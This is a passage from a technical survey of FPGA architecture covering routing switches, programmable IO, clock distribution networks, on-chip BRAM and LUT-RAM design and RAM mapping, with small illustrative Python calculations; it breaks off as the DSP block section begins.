illustrated in Fig. 5a, most logic blocks now group multiple BLEs together with local
routing. This means that each logic block is a small cluster in a hierarchical FPGA;
island-style routing interconnects the resulting thousands of logic clusters.
There has been a great deal of research into the optimal amount of switching,
and how to best arrange the switches. While there are many detailed choices, a few
principles have emerged. The first is that the connectivity between function block
pins and wires (Fc) can be relatively low: typically only 10% or less of the wires that
pass by a pin will have switches to connect to it. Similarly, the number of other wires
that a routing wire can connect to at its end (Fs) can also be low, but it should be at
least 3 so that a signal can turn left, right, or go straight at a wire endpoint. The local
routing in a logic cluster (described in the “Programmable Logic Blocks” section)
allows some block inputs and some block outputs to be swapped during routing
(i.e., general programmable routing can deliver a signal to one of several input
pins, which can then be routed to the right LUT input using the local crossbar). By
leveraging this extra degree of flexibility and considering all the options presented
by the multi-stage programmable routing network, the routing CAD tool can achieve
high completion rates even with low Fc and Fs values. Switch patterns that give
more options to the routing CAD tool also help routability; for example, the Wilton
switch pattern ensures that following a different sequence of channels lets the
router reach different wire segments near a destination block (Tang et al. 2019).
Some recent architectures have also created L-shaped routing segments (formed by
shorting a horizontal and vertical metal segment together) that allow connections
between diagonally nearby blocks with fewer routing switches (Sivaswamy et al.
2005; Petersen et al. 2021).
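In rough numbers, these flexibility parameters translate into multiplexer sizes as sketched below; all values are illustrative assumptions, not figures from any specific device.

    W = 200      # routing wires in a channel (illustrative)
    Fc = 0.10    # fraction of channel wires a block pin can connect to
    Fs = 3       # wires a routing wire can reach at its endpoint (left/straight/right)

    conn_mux_inputs = int(Fc * W)  # ~20-input connection-block multiplexer per pin
    print(conn_mux_inputs, Fs)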
There are also multiple options for the electrical design of programmable
switches, as shown in Fig. 11. Early FPGAs used pass gate transistors controlled
by SRAM cells to connect wires. While this is the smallest switch possible, the
delay of routing wires connected in series by pass transistors grows quadratically,
making them very slow for large FPGAs. Adding some tri-state buffer switches
costs area, but improves speed (Betz and Rose 1999). Most recent FPGAs primarily
use a multiplexer built out of pass gates followed by a buffer that cannot be tri-
stated, as shown in detail in Fig. 5b. The pass transistors in this direct drive switch
can be small as they are lightly loaded, while the buffer can be larger to drive the
significant capacitance of a routing wire segment. Such direct drive switches create
a major constraint on the switch pattern: a wire can only be driven at one point, so
only function block outputs and routing wires near that point can feed its routing
multiplexer inputs and hence be possible signal sources. Despite this constraint,
both academic and industrial work has concluded that direct drive switches improve
both area and speed due to their superior electrical characteristics (Lewis et al. 2003;
Lemieux et al. 2004). The exception is expensive or rare wires such as long wires
implemented on wide metal traces on upper metal layers or the interposer-crossing
wires discussed later in the “Interposers” section. These wires often have multiple
tri-state buffers that can drive them, as the cost of these larger programmable
switches is merited to allow more flexible usage of these expensive wires.

Fig. 11 Circuit designs for programmable routing switches: SRAM-controlled pass gates, tri-state buffers, and buffered multiplexers
A major challenge for FPGA routing is that the delay of long wires is not
improving with process scaling, which means that the delay to cross the chip
is stagnating or increasing even as clock frequencies rise. This has led FPGA
application developers to increase the amount of pipelining in their designs, thereby
allowing multiple clock cycles for long routes. To make this strategy more effective,
some FPGA manufacturers have integrated registers within the routing network
itself. Intel’s Stratix 10 device allows each routing driver (i.e., multiplexer followed
by a buffer) to be configured as a pulse latch as shown in Fig. 7b, thereby acting as
a register with low delay but relatively poor hold time. This allows deep pipelining
of interconnect without using expensive logic resources, at the cost of a modest
area and delay increase to the routing driver (Lewis et al. 2016). However, their
poor hold time means using pulse latches in immediately consecutive Stratix 10
routing switches would lead to hold time violations, so not all of these interconnect
registers can be simultaneously used. Therefore, Intel refined this approach in their
Agilex devices by integrating actual registers (with better hold time) on only one-
third of the interconnect drivers to mitigate the area cost (Chromczak et al. 2020).
Rather than integrating registers throughout the interconnect, Xilinx’s Versal devices
instead add bypassable registers only on the inputs to function blocks. Unlike Intel’s
interconnect registers, these input registers are full-featured, with clock enable and
clear signals (Gaide et al. 2019).
Programmable IO
Fig. 12 Overview of the different techniques for implementing programmable IOs in FPGAs
FPGAs use IO buffers that can operate across a range of voltages. As shown in part 1 of Fig. 12,
these IOs are grouped into banks (commonly on the order of 50 IOs per bank), where
each bank has a separate Vddio rail for the IO buffers. This allows different banks to
operate at different voltage levels. For example, IOs in one bank could be operating
at 1.8 V while those in a different bank operate at 1.2 V. Second, each IO can be
used separately for single-ended standards, or pairs of IOs can be programmed to
implement the positive and negative lines for differential IO standards, as in part 2.
Third, IO buffers are implemented with multiple parallel pull-up and pull-down
transistors so that their drive strengths can be programmably adjusted by enabling
or disabling different numbers of pull-up/pull-down pairs. This is illustrated in part
3 of Fig. 12. By programming some pull-up or pull-down transistors to be enabled
even when no output is being driven, FPGA IOs can minimize signal reflections
by implementing different on-chip termination resistances. Programmable delay
chains, shown in part 4 of Fig. 12, provide a fourth level of configurability, allowing fine delay
adjustments of signal timing to and from the IO buffer.
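As a rough model of the drive-strength programmability in part 3: enabled pull-up/pull-down pairs act in parallel, so the effective output impedance scales inversely with their count. The per-pair resistance below is an assumed, illustrative value.

    R_PAIR = 300.0  # ohms contributed by one pull-up/pull-down pair (assumed)

    def output_impedance(enabled_pairs):
        # Parallel pairs: impedance scales as 1/n of the enabled pairs.
        return R_PAIR / enabled_pairs

    for n in (1, 2, 3, 6):
        print(n, output_impedance(n))  # e.g., 6 pairs -> 50-ohm on-chip termination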
In addition to electrical and timing programmability, FPGA IO blocks contain
additional hardened digital circuitry to simplify capturing and transferring IO data
to the fabric. Generally, some or all of this hardened circuitry can be bypassed
by SRAM-controlled muxes, allowing FPGA users to choose which hardened
functions are desirable for a given design and IO protocol. Part 5 of Fig. 12
shows a number of common digital logic options on the IO input path: a capture
register, double-to-single data rate conversion registers (used with DDR memories),
and serial-to-parallel converters to allow transfers to the programmable fabric
operating at a lower frequency. Most FPGAs now also contain bypassable blocks
that connect to a group of IOs and implement higher-level protocols like DDR
memory controllers. Together these approaches allow the general-purpose FPGA
IOs to service many different protocols, at speeds up to 3.2 Gb/s.
The highest speed IOs implement serial protocols, such as PCIe and Ethernet,
that embed the clock in data transitions and can run at 28 Gb/s or more. To achieve
these speeds, FPGAs include a separate group of differential-only IOs that can only
be used as serial transceivers and have less voltage and electrical programmability
(Upadhyaya et al. 2016). Just as for the general-purpose IOs, these serial IOs have
a sequence of high-speed hardened circuits between them and the fabric, some of
which can be optionally bypassed to allow end-users to customize the exact interface
protocol.
Overall, FPGA IO design is very challenging, due to the dual (and competing)
demands to make the IO not only very fast but also programmable. In addition,
the rest of the FPGA fabric should also be designed appropriately to keep up with
the IO bandwidth; distributing the very high data bandwidths from IO interfaces
requires wide soft buses to be configured using the programmable routing and logic.
This creates additional challenges that will be discussed later in the “System-Level
Interconnect: Network-on-Chip” section.
Programmable Clock Distribution Networks

Since FPGA applications are often communicating with many different devices at
different speeds, they commonly include many different clock domains. Most of
these clocks are generated on-chip by programmable phase-locked loops (PLLs),
delay-locked loops (DLLs) and clock data recovery (CDR) circuits. Distributing that
many high-speed clocks to all the FFs on the chip using the general programmable
routing (discussed in the “Programmable Routing” section) would be extremely
challenging for several reasons:
1. Both the programmable routing architecture and the routing CAD algorithms
for general signals focus on optimizing delay and wire usage. However, routing
clock signals has a different objective: minimizing the clock skew (i.e., balancing
the delay) between different endpoints. While specialized low-skew routing CAD
algorithms have been devised, they still struggle to create balanced trees in
a general programmable interconnect that is not optimized for this case. The
difficulty increases for major system clocks, which can have fanouts of hundreds
of thousands of registers.
2. The programmable routing wires are optimized for density and speed rather than
minimal process variation, and this increases the uncertainty of clocks routed on
them, which in turn degrades timing. Another source of increased uncertainty
is the capacitive crosstalk between the densely spaced routing wires. A signal
(routed on an adjacent wire) toggling at the same time as the clock edge will add
significant clock jitter, degrading both setup and hold timing.
3. The very high toggle rate of clocks makes adding extra capacitance to their
routing highly undesirable, as it will have a significant power impact. The
inefficiency of the general routing wires in creating balanced trees due to both
extra switches and suboptimal switch patterns for this case will lead to higher
clock capacitance and power consumption.
Fig. 13 An example programmable clock distribution network similar to that of Stratix V FPGAs.
It has 16 chip-wide global H-trees (black), 16 smaller H-trees per quadrant (blue), and spine-and-
ribs leaf distribution (red)
Dedicated clock networks avoid these problems, but chip-spanning H-trees are
themselves expensive: these H-trees would add approximately one (wide and
shielded) wire to each routing channel.
Consequently, several techniques are commonly used to implement cheaper
clock distribution networks. Since not all clocks are needed everywhere on the chip,
some global (chip-wide) H-trees for major clock domains are built along with some
smaller ones that cover only portions (e.g., quadrants) of the chip as marked by 1
and 2 in Fig. 13, respectively. For example, fabricating 16 global and 16 quadrant
H-trees enables the use of up to 80 different clocks (16 clocks on the global networks
+ 4 × 16 clocks on the quadrant networks) at a cost equivalent to that of only 32 global
H-trees. Additional wire savings are achieved by implementing the leaf wiring in
a spine-and-ribs style as indicated by 3 and 4 in Fig. 13 instead of continuing
the H-tree fractal pattern down to individual blocks. The last wire level in an
H-tree is called a spine clock and it drives several rib clocks that each span a fraction
of an FPGA row. The clock skew is tolerable as long as the spine and rib wires
are kept reasonably short. To further reduce the cost of the leaf wires (ribs) of the
clock network, programmable multiplexers are added to select only a portion of the
possible spine clock sources to be routed to the rib clocks that functional blocks
can access. In Fig. 13 for example, 32 clock trees are multiplexed down to 6 rib
clocks, reducing the expensive wiring at the leaves of the clock networks by 81%.
This multiplexing leads to a constraint: all the function blocks spanned by a rib
clock (1/8 of a row in many Altera/Intel FPGAs) must together use no more than
6 distinct clocks. This constraint is enforced automatically by the placement CAD
tool during optimization.
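The arithmetic behind these savings is simple enough to check directly; the Python snippet below is a back-of-the-envelope sketch using the Fig. 13 parameters quoted above.

```python
# Back-of-the-envelope check of the clock-network accounting above
# (numbers taken from the Fig. 13 style architecture).
n_global_trees = 16          # chip-wide H-trees
n_quadrant_trees = 16        # H-trees per quadrant
n_quadrants = 4
n_rib_clocks = 6             # spine clocks muxed down to this many ribs

usable_clocks = n_global_trees + n_quadrants * n_quadrant_trees
wiring_cost = n_global_trees + n_quadrant_trees   # in global-tree equivalents
leaf_reduction = 1 - n_rib_clocks / (n_global_trees + n_quadrant_trees)

print(usable_clocks)              # -> 80 distinct clocks
print(wiring_cost)                # -> cost of ~32 global H-trees
print(f"{leaf_reduction:.0%}")    # -> 81% less leaf (rib) wiring
```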
The most recent FPGAs have made clocking networks more flexible. In the
Intel Stratix 10 architecture, the FPGA chip is divided into clock sectors, each
served by its own small routable clock network (Fig. 14a).
Fig. 14 (a) Routable clock networks in Intel Stratix 10 and (b) Spine clock control in Xilinx
Ultrascale+
On-chip Memory
FFs in logic blocks were the first storage elements to be integrated into FPGAs, as
described in the “Programmable Logic Blocks” section. However, as FPGA logic
capacity grew, they were used to implement more complex systems which almost
always require memory to buffer and re-use data. This motivated more on-chip
storage options, since building large RAMs out of registers and LUTs is over 100×
less dense than a dedicated SRAM memory array. At the same time, the memory
requirements of applications implemented on FPGAs are very diverse, including
(but not limited to) small coefficient storage RAMs for FIR filters, large buffers
for network packets, caches and register files for processor-like modules, read-
only memory for instructions, and FIFOs of myriad sizes to decouple computation
modules. This means that there is no single RAM configuration (capacity, word
width, number of ports) that can satisfy the needs of all FPGA designs, making it
challenging to decide on what kind(s) of RAM blocks should be added to an FPGA
such that they are efficient for a broad range of uses. The first FPGA to include hard
functional blocks for memory (block RAMs or BRAMs) was the Altera Flex 10K in
1995. It included columns of small (2 Kb) BRAMs that connect to the rest of the
fabric through the programmable routing. Since then, the capacity and diversity of
FPGA on-chip memories have been gradually increasing and it is typical for ∼25%
of the area of a modern FPGA to be consumed by BRAM tiles (including their
programmable routing) (Tatsumura et al. 2016).
Figure 15 illustrates the organization of an SRAM-based BRAM. An FPGA
BRAM consists of a traditional SRAM memory array at its core, with additional
peripheral circuitry that makes it configurable for different purposes and
provides flexible connectivity to the programmable routing. The core memory array
consists of a two-dimensional array of SRAM cells to store bits, and a considerable
amount of peripheral circuitry to orchestrate access to these cells for read/write
operations. To simplify timing of the read and write operations, all modern FPGA
BRAMs register all their inputs; they also include output registers, but these are
configurable and can be bypassed. During a write operation, the column decoder
activates the write drivers (W D), which in turn charge the bitlines (BL and BL)
according to the input data to-be-written to the memory cells. Simultaneously, the
row decoder activates the wordline (W L) of the row specified by the input write
address, connecting one row of cells to their bitlines so they are overwritten with
new data. During a read operation, both the BL and BL are pre-charged high and
then the row decoder activates the wordline of the row specified by the input read
address. The contents of the activated cells cause a slight difference in the voltage
between BL and BL, which is sensed and amplified by the sense amplifier (SA)
circuit to produce the output data (Tatsumura et al. 2016).
BRAM capacity, data word width, and number of read/write ports are all key
architectural parameters. More capable BRAMs cost more silicon area, so architects
must carefully balance BRAM design choices while taking into account the most
common use cases in application circuits. For example, the area occupied by the
memory cells grows linearly with the capacity of the BRAM, but the area of the
peripheral circuitry and the number of routing ports grows sub-linearly. This means
that larger BRAMs have lower area per bit, making large on-chip buffers more
efficient. On the other hand, if an application requires only small RAMs, much
of the capacity of a larger BRAM may be left unused. Similarly, a BRAM with a
Fig. 15 Organization and circuitry of a conventional dual-port SRAM-based FPGA BRAM. The
components highlighted in blue are common in any SRAM-based memory module, while those
highlighted in green are FPGA-specific. This BRAM has a maximum data width of 8 bits, but the
output crossbar is configured for 4-bit output mode
larger data width can provide higher data bandwidth to downstream logic. However,
it costs more area than a BRAM with the same capacity but a smaller word width,
as the larger data word width necessitates more sense amplifiers, write drivers and
programmable routing ports. Finally, increasing the number of read/write ports to
a BRAM increases the area of both the SRAM cells and the peripheral circuitry,
but again increases the data bandwidth the BRAM can provide and allows more
diverse uses. For example, FIFOs (which are ubiquitous in FPGA designs) require
both a read and a write port. The implementation details of a dual-port SRAM cell
are shown at the bottom of Fig. 15. Implementing a second port to the SRAM cell
(port B highlighted in red) adds two transistors, increasing the area of the SRAM
cells by 33%. In addition, the second port also needs an additional copy of the sense
amplifiers, write drivers and row decoders (the “Read/Write Circuitry B” and “Row
Decoder B” blocks in Fig. 15). If both ports are read/write (r/w), we also have to
double the number of ports to the programmable routing.
Because the FPGA on-chip memory must satisfy the needs of every application
implemented on that FPGA, it is also common to add extra configurability to
BRAMs to allow them to adapt to application needs (Wilton et al. 1995). FPGA
BRAMs are designed to have configurable width and depth by adding low-cost
multiplexing circuitry to the peripherals of the memory array. For example, in
Fig. 15 the actual SRAM array is implemented as a 4×8-bit array, meaning it
naturally stores 8-bit data words. By adding multiplexers controlled by 3 address
bits to the output crossbar, and extra decoding and enabling logic to the read/write
circuitry, this RAM can also operate in 8×4-bit, 16×2-bit or 32×1-bit modes. The
multiplexers in the width configurability decoder (“WCnfg Dec.” in Fig. 15) select
between Vdd and address bits to implement, for example, a configurable word width
of between 1 and 8 bits. The multiplexers are programmed using configuration
SRAM cells and are used to generate column select (CS) and write enable (W en)
signals that control the sense amplifiers and write drivers for narrow read and write
operations, respectively. For typical BRAM sizes (several Kb or more), the cost
of this additional width configurability circuitry is small compared to the cost of a
conventional SRAM array and it does not require any additional costly routing ports.
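As a behavioral illustration of this width configurability, the Python sketch below models the 4×8-bit array of Fig. 15 being accessed as a narrower, deeper memory; the class and its address-splitting scheme are our own simplification, not vendor circuitry.

```python
class WidthConfigurableRAM:
    """Behavioral sketch of the width/depth configurability described
    above: one physical array of 4 rows x 8 bits accessed as a
    narrower, deeper logical memory."""

    PHYS_DEPTH, PHYS_WIDTH = 4, 8

    def __init__(self, word_bits):
        assert self.PHYS_WIDTH % word_bits == 0
        self.w = word_bits
        self.cols = self.PHYS_WIDTH // word_bits   # subwords per physical row
        self.array = [[0] * self.PHYS_WIDTH for _ in range(self.PHYS_DEPTH)]

    def _split(self, addr):
        # Upper address bits drive the row decoder (wordline); the extra
        # low-order bits play the role of the column-select and narrow
        # write-enable signals generated by the "WCnfg Dec." logic.
        return addr // self.cols, addr % self.cols

    def write(self, addr, bits):
        row, col = self._split(addr)
        self.array[row][col * self.w:(col + 1) * self.w] = bits

    def read(self, addr):
        row, col = self._split(addr)
        return self.array[row][col * self.w:(col + 1) * self.w]

ram = WidthConfigurableRAM(word_bits=2)   # 16x2-bit logical mode
ram.write(13, [1, 0])
print(ram.read(13))                       # -> [1, 0]
```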
Another unique component of the FPGA BRAMs compared to conventional
memory blocks is their interface to the programmable routing fabric. This interface
is generally designed to be similar to that of the logic blocks described in
the “Programmable Logic Blocks” section; it is easier to create a routing architecture
that balances flexibility and cost well if all block types connect to it in similar
ways. Connection block multiplexers, followed by local crossbars in some FPGAs,
form the BRAM input routing ports, while the read outputs drive switch block
multiplexers to form the output routing ports. These routing interfaces are costly,
particularly for small BRAMs; they constitute 5% of the area of 256 Kb BRAM
tiles, and this portion grows to 35% for smaller 8 Kb BRAMs (Yazdanshenas et al.
2017). This motivates minimizing the number of routing ports to a BRAM as much
as possible without unduly compromising its functionality. Table 2 summarizes the
number of routing ports required for different numbers and types of BRAM read and
write ports. For example, a single-port BRAM (1r/w) requires W + log2 (D) input
ports for write data and read/write address, and W output ports for read data, where
W and D are the maximum word width and the BRAM depth, respectively. The
table shows that a true dual-port (2r/w) BRAM requires 2W more ports compared
to a simple dual-port (1r+1w) BRAM, which significantly increases the cost of the
routing interfaces. While true dual-port memory is useful for register files, caches
and shared memory switches, the most common use of multi-ported RAMs on
FPGAs is for FIFOs, which require only one read and one write port (1r+1w rather
than 2r/w ports). Consequently, FPGA BRAMs typically have true dual-port SRAM
cores but with only enough routing interfaces for simple-dual port mode at the full
width supported by the SRAM core (W ), and limit the width of the true-dual port
mode to only half of the maximum width (W/2).
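The port-count accounting above can be captured in a few lines; the helper below uses our own naming and, like the accounting in the text, ignores enables and clocks. It shows why a true dual-port BRAM needs 2W more routing ports than a simple dual-port one.

```python
import math

def bram_routing_ports(W, D, mode):
    """Routing-port accounting from the text: W = maximum word width,
    D = depth; modes follow the 1r/w, 1r+1w, 2r/w naming used above."""
    addr = math.ceil(math.log2(D))
    if mode == "1r/w":     # single port: one shared read/write address
        return W + addr, W
    if mode == "1r+1w":    # simple dual port (FIFO-style): two addresses
        return W + 2 * addr, W
    if mode == "2r/w":     # true dual port: two full read/write ports
        return 2 * (W + addr), 2 * W
    raise ValueError(mode)

for mode in ("1r/w", "1r+1w", "2r/w"):
    ins, outs = bram_routing_ports(W=32, D=512, mode=mode)
    print(mode, ins, outs)
# 2r/w totals 2W more ports than 1r+1w: (4W + 2*addr) vs (2W + 2*addr).
```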
Another way to mitigate the cost of additional BRAM ports is to multi-pump the
memory blocks by operating the BRAMs at a frequency that is a multiple of that
used for the rest of the design logic. By doing so, a physically single-ported SRAM
array can implement a logically multi-ported BRAM without the cost of additional
ports as in Tabula’s Spacetime architecture (Halfhill 2010). Multi-pumping can
also be used with conventional FPGA BRAMs by building the time-multiplexing
logic in the soft fabric (LaForest et al. 2012); however, this leads to aggressive
timing constraints for the time-multiplexing logic, which can make timing closure
more challenging and increase compile time. For example, Ahmed et al. (2019)
showed that careful design partitioning, floorplanning and iterative compilation are
necessary for meeting timing on the time-multiplexing logic especially when using
a large number of multi-pumped BRAMs. Altera introduced quad-port BRAMs in
its Mercury devices in the early 2000s to make shared memory switches (useful in
packet processing) and register files more efficient. However, this feature increased
the BRAM size and was not used widely enough to justify its inclusion in subsequent
FPGA generations. Instead, designers use a variety of techniques to combine dual-
ported FPGA BRAMs and soft logic to make highly-ported structures when needed,
albeit at lower efficiency (LaForest et al. 2012). We refer the interested reader to both
Tatsumura et al. (2016) and Yazdanshenas et al. (2017) for extensive details about
the design of BRAM core and peripheral circuitry.
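A minimal behavioral sketch of multi-pumping follows, assuming a 2× internal clock and a write-before-read ordering; both are our own illustrative choices, not a description of any vendor's implementation.

```python
class DoublePumpedRAM:
    """Minimal behavioral sketch of multi-pumping: a single-ported
    memory clocked at 2x the design frequency services one write and
    one read per design clock cycle."""

    def __init__(self, depth):
        self.mem = [0] * depth

    def design_cycle(self, raddr, waddr, wdata):
        # Fast-clock phase 0: use the single port for the write.
        self.mem[waddr] = wdata
        # Fast-clock phase 1: reuse the same port for the read.
        return self.mem[raddr]

ram = DoublePumpedRAM(16)
# Write-before-read ordering is an arbitrary choice for this sketch.
print(ram.design_cycle(raddr=3, waddr=3, wdata=42))   # -> 42
```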
In addition to BRAMs, most FPGAs can re-use at least some of their LUTs
as memory. The truth tables in the logic block K-LUTs are 2^K×1-bit read-only
memories; they are written once by the configuration circuitry when the design
bitstream is loaded. Since LUTs already have read circuitry (read out a stored
value based on a K-bit input/address), they can be used as small LUT-based
RAMs (LUT-RAMs) just by adding low-cost designer-controlled write circuitry.
However, a major concern is the number of additional routing ports necessary to
implement the write functionality to change a LUT to a LUT-RAM. For example, an
ALM in recent Altera/Intel architectures is a 6-LUT that can be fractured into two
5-LUTs and has 8 input routing ports, as explained in the “Programmable Logic
Blocks” section. This means it can operate as a 64×1-bit or a 32×2-bit memory
with 6 or 5 bits for read address, respectively. This leaves only 2 or 3 unused
routing ports, which are not enough for write address, data, and write enable (8
total signals) if we want to read and write in each cycle (simple dual-port mode),
which is the most commonly used RAM mode in FPGA designs. To overcome
this problem, an entire logic block of 10 ALMs is configured as a LUT-RAM to
amortize the control circuitry and address bits across 10 ALMs. The write address
and write enable signals are assembled by stealing a single unused routing port
from each ALM and broadcasting the resulting address and enable to all the ALMs
in a logic block (Lewis et al. 2009). Consequently, a logic block can implement a
64×10-bit or 32×20-bit simple dual-port RAM, with the restriction that a single
logic block cannot mix logic and LUT-RAM. Xilinx Ultrascale similarly converts
an entire logic block to LUT-RAM, but all the routing ports of one out of the eight
LUTs in a logic block are repurposed to drive the shared write address and enable
signals. Therefore, a Xilinx logic block can implement a 64×7-bit or 32×14-bit
simple dual-port RAM, or a slightly wider single-port RAM (64×8-bit or 32×
16-bit). Avoiding extra routing ports keeps the cost of LUT-RAM low, but it still
adds some area. Since it would be very unusual for a design to use more than
50% of the logic fabric as LUT-RAMs, both Altera/Intel and Xilinx have elected
to make only half (or less) of their logic blocks LUT-RAM capable in their recent
architectures, thereby further reducing the area cost.
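The routing-port shortfall that forces this block-level sharing can be counted directly; a small sketch, using the per-ALM numbers quoted above (the function name is ours):

```python
def lutram_port_shortfall(read_addr_bits, data_bits, input_ports=8):
    """Per-ALM routing-port accounting from the text: 8 input ports per
    ALM; simple dual-port operation needs the read address plus a write
    address, write data, and a write enable."""
    write_signals = read_addr_bits + data_bits + 1   # waddr + wdata + wen
    spare_ports = input_ports - read_addr_bits
    return write_signals - spare_ports               # >0 means ports missing

print(lutram_port_shortfall(6, 1))   # 64x1 mode: 8 needed, 2 spare -> 6 short
print(lutram_port_shortfall(5, 2))   # 32x2 mode: 8 needed, 3 spare -> 5 short
# Stealing one port from each of the 10 ALMs in a logic block yields 10
# shared signals: enough to broadcast the 8 write-control signals.
```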
Designers require many different RAMs in a typical design, all of which must
be implemented by the fixed BRAM and LUT-RAM resources on the chip. Forcing
designers to determine the best way to combine BRAM and LUT-RAM for each
memory configuration they need and writing Verilog to implement them would
be laborious and would also impede migration of the design to a new FPGA
architecture. Instead, the vendor CAD tools include a RAM mapping stage that
implements the logical memories in the user’s design using the physical BRAMs
and LUT-RAMs on the chip. The RAM mapper chooses the physical memory
implementation (i.e., memory type and the width/number/type of its ports) and
generates any additional logic required to combine multiple BRAMs or LUT-RAMs
to implement each logical RAM. An example of mapping a logical 2048×32-bit
RAM with 2 read and 1 write ports to an FPGA with physical 1024×8-bit dual-
port BRAMs is illustrated in Fig. 16. First, four physical BRAMs are combined in
parallel to make wider RAMs with no extra logic. Then, soft logic resources are
used to perform depth-wise stitching of two sets of four physical BRAMs, such that
Fig. 16 Mapping a 2048×32-bit 2r+1w logical RAM to an FPGA with 1024×8-bit 1r+1w
physical BRAMs
Fig. 17 Memory bits per logic element for different generations of Altera/Intel FPGAs starting
from the 350 nm Flex 10K (1995) to the 10 nm Agilex (2019) architecture. FPGA on-chip memory
density has increased by a factor of 16× in the last 25 years. The labels show the sizes of BRAMs
in each generation
the most-significant bits of the write and read addresses are used as write enable
and read output multiplexer select signals, respectively. Finally, in this case, we
require two read ports and one write port while the physical BRAMs only support a
maximum of 2r/w ports. To implement the second read port, the whole structure is
either replicated as shown in the figure or double-pumped as previously explained.
Several algorithms for optimizing RAM mapping are described in Tessier et al.
(2007) and Lai and Lin (2016).
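The mapping arithmetic of Fig. 16 generalizes naturally; the sketch below counts the BRAMs a logical RAM consumes, assuming 1r+1w physical BRAMs and read-port replication rather than double-pumping (function and parameter names are ours).

```python
import math

def bram_count(logical_depth, logical_width, read_ports,
               phys_depth, phys_width):
    """Fig. 16 style mapping arithmetic for 1r+1w physical BRAMs."""
    width_stitch = math.ceil(logical_width / phys_width)  # BRAMs in parallel
    depth_stitch = math.ceil(logical_depth / phys_depth)  # groups muxed by MSBs
    replicas = read_ports                                 # one copy per read port
    return width_stitch * depth_stitch * replicas

# The 2048x32-bit 2r+1w logical RAM of Fig. 16 on 1024x8-bit BRAMs:
print(bram_count(2048, 32, 2, 1024, 8))   # -> 16 physical BRAMs
```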
Over the past 25 years, FPGA memory architecture has evolved considerably
and has also become increasingly important, as the ratio of memory to logic on an
FPGA die has grown significantly. Figure 17 plots the memory bits per logic element
(including LUT-RAM) versus the number of logic elements in Altera/Intel devices
starting from the 350 nm Flex 10K devices (1995) to 10 nm Agilex devices (2019).
There has been a gradual increase in the memory richness of FPGAs over time, and
to meet the demand for more bits at a cheaper cost, modern BRAMs have larger
capacities (20 Kb) than the first BRAMs (2 Kb). Some FPGAs have had highly
heterogeneous BRAM architectures in order to provide some physical RAMs that
are efficient for small or wide logical RAMs, and others that are efficient for large
and relatively narrow logical RAMs. For example, Stratix (130 nm) had 3 types of
BRAM, with capacities of 512 b, 4 Kb and 512 Kb. The introduction of LUT-RAM
in Stratix III (65 nm) reduced the need for small BRAMs, so it moved to a memory
architecture with only medium and large size (9 Kb and 144 Kb) BRAMs. Stratix V
(28 nm) and later Intel devices have moved to a combination of LUT-RAM and a
single medium-sized BRAM (20 Kb) to simplify both the FPGA layout as well as
RAM mapping and placement. A similar trend can be observed in Xilinx devices
(Tatsumura et al. 2016); Xilinx’s RAM architecture also combines LUT-RAM and a
medium-sized 18 Kb RAM, but also includes hard circuitry to combine two BRAMs
into a single 36 Kb block. However, Xilinx’s most recent devices add a large 288 Kb
BRAM (UltraRAM) to be more efficient for very large buffers, showing that there
is still no general agreement on the best BRAM architecture. Some recent Intel
devices further enhance their memory capacity by integrating the FPGA fabric with
one or more embedded SRAM (eSRAM) chiplets using interposer technology that
will be discussed in the “Interposers” section later. Each eSRAM chiplet implements
eight large simple dual-port memories with a combined capacity of 47 Mb in Stratix
10 and 18 Mb in Agilex. These memories are ideal for wide and deep buffers that
exceed the capacity of the fabric BRAMs but still benefit from lower latency than
off-chip memory; for example, routing tables or packet headers in networking
applications.
To give some insight into the relative areas and efficiencies of different BRAMs,
Table 3 shows the resource usage, silicon area, and frequency of a 2048×72-bit
logical RAM when it is implemented by Quartus (the CAD flow for Altera/Intel
FPGAs) in a variety of ways on a Stratix IV device. The silicon areas are computed
using the published Stratix III block areas from Wong et al. (2011) and scaling them
from 65 nm down to 40 nm, as Stratix III and IV have the same architecture but use
different process nodes. As this logical RAM is a perfect fit to the 144 Kb BRAM
in Stratix IV, it achieves the best area when mapped to a single 144 Kb BRAM.
Interestingly, mapping to eighteen 9 Kb BRAMs is only 1.9× larger in silicon
area (note that output width limitations lead to 18 BRAMs instead of the 16 one
might expect). The 9 Kb BRAM implementation is actually faster than the 144 Kb
BRAM implementation, as the smaller BRAMs have higher maximum operating
frequencies. Mapping such a large logical RAM to LUT-RAMs is inefficient,
requiring 12.7× more area and running at 40% of the frequency. Finally, mapping
only to the logic and routing resources highlights the importance of BRAMs; the
area is over 300× larger than the 144 Kb BRAM implementation. While the 144 Kb
BRAM is most efficient for this single test case, real designs have diverse logical
RAMs, and for small or shallow memories the 9 Kb and LUT-RAM options would
outperform the 144 Kb BRAM, motivating a diversity of on-chip RAM resources.
To choose the best mix of BRAM sizes and maximum word widths, one needs both
a RAM mapping tool and tools to estimate the area, speed and power of each BRAM
(Yazdanshenas et al. 2017). Published studies into BRAM architecture trade-offs for
FPGAs include (Yazdanshenas et al. 2017; Lewis et al. 2013).
To date, all commercial FPGAs have used only SRAM-based memory cells in their
BRAMs. With the desire for denser BRAMs that would enable more memory-
Table 3 Implementation results for a 2048×72-bit 1r+1w RAM using BRAMs, LUT-RAMs and
registers on Stratix IV
Implementation   Half-ALMs   9K BRAMs   144K BRAMs   Area (mm²)     Freq. (MHz)
144K BRAMs       0           0          1            0.22 (1.0×)    336 (1.0×)
9K BRAMs         0           18         0            0.41 (1.9×)    497 (1.5×)
LUT-RAM          6597        0          0            2.81 (12.8×)   134 (0.4×)
Registers        165155      0          0            68.8 (313×)    129 (0.4×)
rich FPGAs and SRAM scaling becoming increasingly difficult due to process
variation, a few academic studies have explored the use of other emerging memory
technologies such as magnetic tunnel junctions (MTJs) to build FPGA memory
blocks. According to Tatsumura et al. (2016), MTJ-based BRAMs could increase
the FPGA memory capacity by up to 2.95× with the same die size; however, they
would increase the process complexity.
DSP Blocks
Fig. 18 DSP block evolution in Altera/Intel and Xilinx FPGAs. Incrementally added features are
highlighted in red
Fig. 19 Fracturing an 18×18 multiplier array into two 9×9 arrays with the same number of
input/output ports
In addition to the fracturable multiplier arrays, the Stratix DSP also incorporated
an adder/output block to perform summation and accumulation operations, as well
as hardened input registers that could be configured as shift registers with dedicated
cascade interconnect between them to implement efficient FIR filter structures.
Xilinx also adopted a fully-featured DSP block approach by introducing their
DSP48 tiles in the Virtex-4 architecture. Each DSP tile had two fixed-precision
18×18 bit multipliers with similar functionalities to the Stratix DSP block (e.g.,
input cascades, adder/subtractor/accumulator). Virtex-4 also introduced the ability
to cascade the adders/accumulators using dedicated interconnects on the output
side of the DSP blocks to implement high-speed systolic FIR filters with hardened
reduction chains.
An N-tap FIR filter performs a discrete 1D convolution between the samples of
